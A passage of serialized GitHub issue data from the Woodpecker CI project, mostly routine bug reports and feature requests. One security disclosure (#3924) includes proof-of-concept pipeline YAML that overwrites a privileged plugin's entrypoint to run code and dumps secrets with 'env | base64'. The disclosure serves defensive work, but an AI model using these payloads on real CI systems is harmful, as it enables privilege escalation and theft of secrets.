\r\n\n\n### Steps to reproduce\n\n.\n\n### Expected behavior\n\n_No response_\n\n### System Info\n\n```shell\n\"next-d126cf9e35\"\n```\n\n\n### Additional context\n\n_No response_\n\n### Validations\n\n- [X] Read the [docs](https://woodpecker-ci.org/docs/intro).\n- [X] Check that there isn't [already an issue](https://github.com/woodpecker-ci/woodpecker/issues) that reports the same bug to avoid creating a duplicate.\n- [X] Checked that the bug isn't fixed in the `next` version already [https://woodpecker-ci.org/faq#which-version-of-woodpecker-should-i-use]",[1984,1987],{"name":1985,"color":1986},"bug","d73a4a",{"name":1988,"color":1989},"ui","46DEA2",4677,"woodpecker-ci","woodpecker","open","`tag` pipelines are missing avatar and commit title","2025-01-12T06:19:42Z","https://github.com/woodpecker-ci/woodpecker/issues/4677",0.6806494,{"description":1999,"labels":2000,"number":2005,"owner":1991,"repository":1992,"state":1993,"title":2006,"updated_at":2007,"url":2008,"score":2009},"https://ci.woodpecker-ci.org/repos/8987/pipeline/94/errors\r\n\r\nversion: current main",[2001,2002],{"name":1985,"color":1986},{"name":2003,"color":2004},"server","5D7A92",4249,"[Bug] MultiForge: second forge can not be used","2024-10-25T17:33:00Z","https://github.com/woodpecker-ci/woodpecker/issues/4249",0.7294946,{"description":2011,"labels":2012,"number":2019,"owner":1991,"repository":1992,"state":1993,"title":2020,"updated_at":2021,"url":2022,"score":2023},"I think we should have a look at https://nextcloud.com/contribute/ and chery-pick some ideas from that",[2013,2016],{"name":2014,"color":2015},"documentation","7D625D",{"name":2017,"color":2018},"enhancement","7E1FE4",4113,"Improve docs about starting to contribute","2024-09-15T09:47:05Z","https://github.com/woodpecker-ci/woodpecker/issues/4113",0.7351984,{"description":2025,"labels":2026,"number":2031,"owner":1991,"repository":1992,"state":2032,"title":2033,"updated_at":2034,"url":2035,"score":2036},"### Clear and concise description of the problem\r\n\r\nI'm trying to run a container image build step in my pipeline that uses [buildah](https://quay.io/repository/buildah/stable?tab=info). I'm running into a lot of permission errors like this:\r\n\r\n```\r\ntime=\"2023-10-07T19:59:26Z\" level=error msg=\"writing \\\"0 0 4294967295\\\\n\\\" to /proc/17/uid_map: write /proc/17/uid_map: operation not permitted\"\r\ntime=\"2023-10-07T19:59:26Z\" level=error msg=\"(Unable to determine exit status)\"\r\n```\r\n\r\nAfter some experimentation with podman and buildah containers on my cluster, I have determined that I need to configure a few different settings at the Pod level for this to work:\r\n\r\n- `metadata.annotations`: I need to be able to set `container.apparmor.security.beta.kubernetes.io/\u003Ccontainer_name>` to use a custom apparmor profile for my buildah container. I would like to use the `WOODPECKER_BACKEND_K8S_POD_ANNOTATIONS` env variable, but since the container names are randomly generated I'm not sure how to make this work.\r\n- `spec.securityContext`: The only way I have found to make buildah work is to run it as non-root. This means that I need to set `runAsUser`, `runAsGroup`, and `fsGroup` on the Pod level `securityContext` (not the container level).\r\n\r\n### Suggested solution\r\n\r\nAdding support for `securityContext` seems like it should be fairly straightforward. We could just follow that same approach that is currently used for `resources`, `nodeSelector`, etc. [documented here](https://woodpecker-ci.org/docs/next/administration/backends/kubernetes#resources).\r\n\r\nThe AppArmor profile is trickier since the container name needs to be included in the annotation key. I'm imagining a configuration like `backend_options.kubernetes.appArmorProfile` that could take all of the possible values for the annotation [documented here](https://kubernetes.io/docs/tutorials/security/apparmor/). Then, the pod generation logic would just look for this configuration and add the appropriate annotation if it's found.\r\n\r\n### Alternative\r\n\r\nI could disable AppArmor entirely, but that's not really advisable for a production environment. I could also try to find a way to get the buildah container running as root (it should be possible), but again, that's not ideal from a security perspective.\r\n\r\n### Additional context\r\n\r\nThis is somewhat of a follow up from #2510. I'm trying to get Woodpecker to run on my kubeadm/CRI-O based cluster running on Debian which I believe makes me some kind of leprechaun/unicorn/lochness monster. There definitely aren't many of us out there.\r\n\r\n### Validations\r\n\r\n- [X] Checked that the feature isn't part of the `next` version already [https://woodpecker-ci.org/faq#which-version-of-woodpecker-should-i-use]\r\n- [X] Read the [Contributing Guidelines](https://github.com/woodpecker-ci/woodpecker/blob/main/CONTRIBUTING.md).\r\n- [X] Read the [docs](https://woodpecker-ci.org/docs/intro).\r\n- [X] Check that there isn't already an [issue](https://github.com/woodpecker-ci/woodpecker/issues) that request the same feature to avoid creating a duplicate.",[2027,2028],{"name":2017,"color":2018},{"name":2029,"color":2030},"backend/kubernetes","bfdadc",2545,"closed","Support AppArmor annotations and securityContext in kubernetes backend","2024-01-12T22:32:26Z","https://github.com/woodpecker-ci/woodpecker/issues/2545",0.7108221,{"description":2038,"labels":2039,"number":2041,"owner":1991,"repository":1992,"state":2032,"title":2042,"updated_at":2043,"url":2044,"score":2045},"### Component\n\nserver, agent\n\n### Describe the bug\n\nIf you try to set proxy related env vars in a pipeline step, they won't get used. They are present but without the given values:\r\n\r\n```yaml\r\nwhen:\r\n - event: [pull_request, tag, cron]\r\n - event: push\r\n branch:\r\n - ${CI_REPO_DEFAULT_BRANCH}\r\n - renovate/*\r\n\r\nvariables:\r\n - &golang \"golang:1.21\"\r\n - proxy_args: &proxy_args\r\n - \"http_proxy=http://swarmproxy:8888\"\r\n - \"https_proxy=http://swarmproxy:8888\"\r\n - \"no_proxy=.myhost.com\"\r\n - \"TESTENV=DEBUGGING\"\r\nsteps:\r\n test:\r\n image: *golang\r\n environment:\r\n - \u003C\u003C: *proxy_args\r\n commands:\r\n - env | sort\r\n - go test -cover ./...\r\n```\r\n\r\nThe output looks like this:\r\n\r\n```shell\r\n....\r\nGOLANG_VERSION=1.21.4\r\nGOPATH=/go\r\nGOTOOLCHAIN=local\r\nHOME=/root\r\nHOSTNAME=45d463959e69\r\nHTTPS_PROXY=\r\nHTTP_PROXY=\r\nNO_PROXY=\r\nPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\r\nPWD=/woodpecker/src/xxxxxx/Templates/plugin-extend-env\r\nSHELL=/bin/sh\r\nTESTENV=DEBUGGING\r\nhttp_proxy=\r\nhttps_proxy=\r\nno_proxy=\r\n+ go test -cover ./...\r\ngo: downloading github.com/urfave/cli/v2 v2.25.7\r\ngo: downloading github.com/sirupsen/logrus v1.9.3\r\ngo: downloading github.com/Masterminds/semver/v3 v3.2.1\r\ngo: downloading github.com/joho/godotenv v1.5.1\r\nsemver.go:6:2: github.com/Masterminds/semver/v3@v3.2.1: Get \"https://proxy.golang.org/github.com/%21masterminds/semver/v3/@v/v3.2.1.zip\": dial tcp: lookup proxy.golang.org on 127.0.0.11:53: no such host\r\ntools.go:3:8: github.com/joho/godotenv@v1.5.1: Get \"https://proxy.golang.org/github.com/joho/godotenv/@v/v1.5.1.zip\": dial tcp: lookup proxy.golang.org on 127.0.0.11:53: no such host\r\nlogger.go:6:2: github.com/sirupsen/logrus@v1.9.3: Get \"https://proxy.golang.org/github.com/sirupsen/logrus/@v/v1.9.3.zip\": dial tcp: lookup proxy.golang.org on 127.0.0.11:53: no such host\r\nflags.go:4:2: github.com/urfave/cli/v2@v2.25.7: Get \"https://proxy.golang.org/github.com/urfave/cli/v2/@v/v2.25.7.zip\": dial tcp: lookup proxy.golang.org on 127.0.0.11:53: no such host\r\n...\r\n```\n\n### System Info\n\n```shell\n{\r\n \"source\": \"https://github.com/woodpecker-ci/woodpecker\",\r\n \"version\": \"1.0.5\"\r\n}\n```\n\n\n### Additional context\n\n_No response_\n\n### Validations\n\n- [X] Read the [Contributing Guidelines](https://github.com/woodpecker-ci/woodpecker/blob/main/CONTRIBUTING.md).\n- [X] Read the [docs](https://woodpecker-ci.org/docs/intro).\n- [X] Check that there isn't [already an issue](https://github.com/woodpecker-ci/woodpecker/issues) that reports the same bug to avoid creating a duplicate.\n- [X] Checked that the bug isn't fixed in the `next` version already [https://woodpecker-ci.org/faq#which-version-of-woodpecker-should-i-use]\n- [X] Check that this is a concrete bug. For Q&A join our [Discord Chat Server](https://discord.gg/fcMQqSMXJy) or the [Matrix room](https://matrix.to/#/#woodpecker:matrix.org).",[2040],{"name":1985,"color":1986},2858,"Proxy environment variables not passed through in pipeline steps","2023-12-03T16:50:09Z","https://github.com/woodpecker-ci/woodpecker/issues/2858",0.72272724,{"description":2047,"labels":2048,"number":2052,"owner":1991,"repository":1992,"state":2032,"title":2053,"updated_at":2054,"url":2055,"score":2056},"# Getting privileged permissions using an escalated plugin by adjusting workspace\r\n\r\nDear Woodpecker Security Team,\r\n\r\nI am writing to inform you about the possibility of running arbitrary code in a privileged container using the default configuration.\r\nAs you know, the default configuration has multiple containers that run in privileged mode. These include the \"plugins/docker\" image. (I haven't looked at the other images, though I'm sure they are vulnerable to the same or similar exploits.)\r\nMy POC uses the workspace attribute with the base set to \"/use/local\". This way, I can place a file at \"/usr/local/bin/dockerd-entrypoint.sh\" in a step before the \"plugins/docker\" step to overwrite the commands executed in the privileged container.\r\n\r\n```\r\nworkspace:\r\n base: /usr/local/\r\n\r\nsteps:\r\n- name: prepare\r\n image: alpine\r\n commands:\r\n - mkdir -p /usr/local/bin/\r\n - cp fake-local/bin/dockerd-entrypoint.sh /usr/local/bin/dockerd-entrypoint.sh\r\n - cp ncat /usr/local/ncat\r\n - cp bash /usr/local/bash\r\n - chmod +x /usr/local/bin/dockerd-entrypoint.sh\r\n - chmod +x /usr/local/ncat\r\n - chmod +x /usr/local/bash\r\n- name: drone\r\n image: plugins/docker\r\n```\r\n\r\nThis is possible because the only things checked before allowing the setting of the container to privileged are that the \"Commands\" and \"Entrypoint\" attributes are unset using the \"IsPlugin\" function.\r\nThere are multiple other ways to gain code execution in the privileged container, such as setting environment variables like \"LD\\_PRELOAD\".\r\n\r\nI only tested this in the docker runner, but looking at the code, the same should be possible for the kubernetes runner.\r\n\r\nI'm not sure how to fix this correctly, as it is broken by design when allowing the building of docker images inside the CI.\r\n\r\nSimilar bugs exist in the Drone CI, so a scheduled disclosure with them makes sense.\r\n\r\nI am also informing you that I am the author of a CTF Challenge where people tried to find and exploit this bug. The event was a final to a qualification with a small number of participants. Two Teams solved the challenge by finding other bugs. I will tell them to report their found vulnerability as well.\r\n\r\nFeel free to follow up with any questions.\r\n\r\nBest,\r\nDaniel Kilimnik\r\n\r\nNeodyme AG\r\n\r\n---\r\n\r\n# Getting secrets value using manipulated entrypoint via adjusted workspace\r\n\r\n1. create a secret called `TOKEN` for the plugin `plugins/docker` only\r\n\r\n2. create this pipeline\r\n```yaml\r\nskip_clone: true\r\n\r\nworkspace:\r\n base: /usr/local/\r\n\r\nsteps:\r\n- name: prepare\r\n image: alpine\r\n commands:\r\n - mkdir -p /usr/local/bin/\r\n - 'echo \"#!/bin/sh\" > /usr/local/bin/dockerd-entrypoint.sh'\r\n - 'echo \"env\" >> /usr/local/bin/dockerd-entrypoint.sh'\r\n - 'echo \"echo -------\" >> /usr/local/bin/dockerd-entrypoint.sh'\r\n - 'echo \"env | base64\" >> /usr/local/bin/dockerd-entrypoint.sh'\r\n - chmod +x /usr/local/bin/dockerd-entrypoint.sh\r\n- name: drone\r\n image: plugins/docker\r\n settings:\r\n token:\r\n from_secret: TOKEN\r\n```\r\n\r\n3. decode the base64 and wolla successfully reused the exploid in a different area\r\n\r\n\r\n\r\n\r\n\r\n\r\n---\r\n\r\n\r\n GHSA-xw35-rrcp-g7xm",[2049],{"name":2050,"color":2051},"security","B60205",3924,"Getting \"privileged permissions\" / \"secrets value\" by using (... an escalated plugin and/) by adjusting workspace","2024-10-04T14:06:28Z","https://github.com/woodpecker-ci/woodpecker/issues/3924",0.7229368,{"description":2058,"labels":2059,"number":2062,"owner":1991,"repository":1992,"state":2032,"title":2063,"updated_at":2064,"url":2065,"score":2066},"### Component\n\nweb-ui\n\n### Describe the bug\n\nThe spaces in task output should be kept.\r\n\r\n\r\n\n\n### System Info\n\n```shell\n\"source\": \"https://github.com/woodpecker-ci/woodpecker\",\r\n\"version\": \"next-9feb6be9\"\n```\n\n\n### Additional context\n\n_No response_\n\n### Validations\n\n- [X] Read the [Contributing Guidelines](https://github.com/woodpecker-ci/woodpecker/blob/master/CONTRIBUTING.md).\n- [X] Read the [docs](https://woodpecker-ci.org/docs/intro).\n- [X] Check that there isn't [already an issue](https://github.com/woodpecker-ci/woodpecker/issues) that reports the same bug to avoid creating a duplicate.\n- [X] Check that this is a concrete bug. For Q&A join our [Discord Chat Server](https://discord.gg/fcMQqSMXJy).",[2060,2061],{"name":1985,"color":1986},{"name":1988,"color":1989},718,"The spaces in task output should be kept.","2022-06-16T17:24:27Z","https://github.com/woodpecker-ci/woodpecker/issues/718",0.7237554,{"description":2068,"labels":2069,"number":2071,"owner":1991,"repository":1992,"state":2032,"title":2072,"updated_at":2073,"url":2074,"score":2075},"### Component\r\n\r\nserver, web-ui\r\n\r\n### Describe the bug\r\n\r\nHi, I have problem with my woodpecker instance. I'm using Github to provide OAuth2 Authorization. But the problem I cannot log in to the app. When I clicking \"Log in\" button, it returns to the same screen. Sometimes when I do many clicks in small amount time I need reatuhorize it in Github.\r\n\r\nInstance is hidden with ngnix proxy manager. \r\n\r\nMy docker compose looks like this:\r\n```\r\nservices:\r\n woodpecker-server:\r\n image: woodpeckerci/woodpecker-server:latest\r\n expose:\r\n - 8000\r\n - 9000\r\n volumes:\r\n - ./woodpecker-server-data:/var/lib/woodpecker/\r\n environment:\r\n - WOODPECKER_OPEN=false\r\n - WOODPECKER_HOST=${WOODPECKER_HOST}\r\n - WOODPECKER_GITHUB=true\r\n - WOODPECKER_GITHUB_CLIENT=${WOODPECKER_GITHUB_CLIENT}\r\n - WOODPECKER_GITHUB_SECRET=${WOODPECKER_GITHUB_SECRET}\r\n - WOODPECKER_AGENT_SECRET=${WOODPECKER_AGENT_SECRET}\r\n - WOODPECKER_ADMIN=${WOODPECKER_ADMIN}\r\n - WOODPECKER_REPO_OWNERS=${WOODPECKER_REPO_OWNERS}\r\n networks:\r\n - ngnix-internal\r\n - composehook-internal\r\n woodpecker-agent:\r\n image: woodpeckerci/woodpecker-agent:latest\r\n command: agent\r\n restart: always\r\n depends_on:\r\n - woodpecker-server\r\n volumes:\r\n - ./woodpecker-agent-config:/etc/woodpecker\r\n - /var/run/docker.sock:/var/run/docker.sock\r\n environment:\r\n - WOODPECKER_SERVER=woodpecker-server:9000\r\n - WOODPECKER_AGENT_SECRET=${WOODPECKER_AGENT_SECRET}\r\n - WOODPECKER_BACKEND_DOCKER_NETWORK=composehook-internal\r\n networks:\r\n - ngnix-internal\r\n - composehook-internal\r\nnetworks:\r\n ngnix-internal:\r\n external: true\r\n name: ngnix-internal\r\n composehook-internal:\r\n external: true\r\n name: composehook-internal\r\n```\r\n\r\nIn logs I haven't see something weird or wrong.\r\n\r\n\r\n### System Info\r\n\r\n```shell\r\n{\"source\":\"https://github.com/woodpecker-ci/woodpecker\",\"version\":\"2.4.1\"}\r\n```\r\n\r\n\r\n### Additional context\r\n\r\n_No response_\r\n\r\n### Validations\r\n\r\n- [X] Read the [docs](https://woodpecker-ci.org/docs/intro).\r\n- [X] Check that there isn't [already an issue](https://github.com/woodpecker-ci/woodpecker/issues) that reports the same bug to avoid creating a duplicate.\r\n- [X] Checked that the bug isn't fixed in the `next` version already [https://woodpecker-ci.org/faq#which-version-of-woodpecker-should-i-use]",[2070],{"name":1985,"color":1986},3689,"Stuck on login screen. ","2024-06-21T08:20:32Z","https://github.com/woodpecker-ci/woodpecker/issues/3689",0.72551864,{"description":2077,"labels":2078,"number":2080,"owner":1991,"repository":1992,"state":2032,"title":2081,"updated_at":2082,"url":2083,"score":2084},"### Component\n\nagent\n\n### Describe the bug\n\nOn an arm64 agent (Raspberry Pi 4b+), the clone step fails when the container is running in podman:\r\n\r\n```\r\n+ git init -b main\r\nInitialized empty Git repository in /woodpecker/src/git.vdx.hu/voidcontext/nix-config/.git/\r\n+ git config --global --replace-all safe.directory /woodpecker/src/git.vdx.hu/voidcontext/nix-config\r\n+ git remote add origin https://git.vdx.hu/voidcontext/nix-config.git\r\n+ git fetch --no-tags --depth=1 --filter=tree:0 origin +a4b83a869d6366bf24921b8f4f3f5836f806f57e:fatal: unable to access 'https://git.vdx.hu/voidcontext/nix-config.git/': Could not resolve host: git.vdx.hu\r\nexit status 128\r\n```\r\n\r\nThe server is on a different server (on amd64).\r\n\r\nExample: https://woodpecker.ci.vdx.hu/repos/109/pipeline/119/5\r\n\r\nThe same pipeline is successful on an amd64 agent (Kubernetes on a 3rd machine).\r\n\r\nThe issue seems to be similar to https://github.com/woodpecker-ci/woodpecker/issues/1407 which has been closed bacause of inactivity.\n\n### Steps to reproduce\n\n1) install server on amd64 machine (A)\r\n2) install agent on arm64 machine (B) using Docker backend that points to a docker compatible podman socket.\r\n3) Run pipeline\n\n### Expected behavior\n\nGit is able to resolve the host as it has a public DNS record.\n\n### System Info\n\n```shell\n{\"source\":\"https://github.com/woodpecker-ci/woodpecker\",\"version\":\"2.6.0\"}\r\n```\n```\n\n\n### Additional context\n\nUnfortunately I wasn't able to test this on `next`.\n\n### Validations\n\n- [X] Read the [docs](https://woodpecker-ci.org/docs/intro).\n- [X] Check that there isn't [already an issue](https://github.com/woodpecker-ci/woodpecker/issues) that reports the same bug to avoid creating a duplicate.\n- [X] Checked that the bug isn't fixed in the `next` version already [https://woodpecker-ci.org/faq#which-version-of-woodpecker-should-i-use]",[2079],{"name":1985,"color":1986},3892,"Git clone step fails with \"Could not resolve host\" error when running fetch","2024-07-18T22:49:20Z","https://github.com/woodpecker-ci/woodpecker/issues/3892",0.7272893,{"description":2086,"labels":2087,"number":2089,"owner":1991,"repository":1992,"state":2032,"title":2090,"updated_at":2091,"url":2092,"score":2093},"### Component\r\n\r\nagent\r\n\r\n### Describe the bug\r\n\r\nWhen having a backend error in the config, i.e. a malformed env var, the step and build are marked as successful even though they should be marked as \"failed\". \r\n\r\n\r\n\r\n\r\nk8s backend\r\n\r\n\r\n### System Info\r\n\r\n```shell\r\n{\"source\":\"https://github.com/woodpecker-ci/woodpecker\",\"version\":\"next-6ab9f802\"}\r\n```\r\n\r\n\r\n### Additional context\r\n\r\n_No response_\r\n\r\n### Validations\r\n\r\n- [X] Read the [Contributing Guidelines](https://github.com/woodpecker-ci/woodpecker/blob/master/CONTRIBUTING.md).\r\n- [X] Read the [docs](https://woodpecker-ci.org/docs/intro).\r\n- [X] Check that there isn't [already an issue](https://github.com/woodpecker-ci/woodpecker/issues) that reports the same bug to avoid creating a duplicate.\r\n- [X] Checked that the bug isn't fixed in the `next` version already [https://woodpecker-ci.org/faq#which-version-of-woodpecker-should-i-use]\r\n- [X] Check that this is a concrete bug. For Q&A join our [Discord Chat Server](https://discord.gg/fcMQqSMXJy) or the [Matrix room](https://matrix.to/#/#woodpecker:matrix.org).",[2088],{"name":1985,"color":1986},1871,"Build is marked as \"successful\" although a backend error occurred","2025-01-10T21:25:48Z","https://github.com/woodpecker-ci/woodpecker/issues/1871",0.7301293,["Reactive",2095],{},["Set"],["ShallowReactive",2098],{"TRc1wZytZ_XrK4EfJfei_Sz-An4H4Yy6syhVxH_PVJc":-1,"U6Q4EM6BfONRrfeVuXYvN3WBrHV7CE7dPHolXvEUn00":-1},"/woodpecker-ci/woodpecker/3095"]